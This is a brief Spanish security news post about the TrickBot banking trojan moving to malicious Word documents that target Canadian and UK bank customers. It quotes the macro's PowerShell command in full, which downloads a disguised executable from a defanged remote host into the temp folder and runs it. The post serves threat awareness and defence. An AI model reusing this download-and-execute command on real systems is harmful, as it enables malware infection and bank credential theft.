Hasta
ahora encontrábamos el troyano bancario TrickBot como
un binario aislado, pero abandona su comportamiento para seguir un modus operandi más habitual de éste tipo
de amenazas. Además, cabe destacar que a pesar de comenzar en Australia y avanzar cruzar el charco hasta Europa, esta vez ha llegado a Canadá.
Captura del documento de Word que solicita habilitar el contenido
Esta vez, encontramos un documento de Word el cual nos pide que habilitemos la edición y el contenido, de esta manera permitiendo que se ejecuten las macros incluidas dentro del documento de Word.
Esta macro, lanza a través de Powershell la descarga de un archivo remoto .png, que a pesar de su extensión no es una imagen...
PowerShell (New-Object
System.Net.WebClient).DownloadFile('hxxp://wingsbiotech.com/kufma/sdogsodngsdlk.png','C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe');Start-process
'C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe';
Tras la descarga de la falsa
iagen ".png", se almacena en %temp% para posteriormente ser ejecutado
con una llamada a start-process
Una vez lograda la infección, comienza a conectarse a servidores remotos para descargar la configuración necesaria para su funcionamiento (tal y como vimos en la anterior una-al-día).
Esta vez, además de a los
clientes de las entidades ya mencionadas se suman a la lista de afectados
Santander UK y a BMO, conocido como "Bank of Montreal" (Canadá).
Recuerda que si recibes un
documento por parte de un desconocido no debes abrirlo. A esto debemos añadir,
que no se deben habilitar posibles ejecuciones de contenido en documentos de
Office cuando el destinatario de este es desconocido, para evitar este tipo de
amenazas.
Más información:
una-al-dia (07/11/2016) El
troyano bancario TrickBot azota a Europa
Fernando Díaz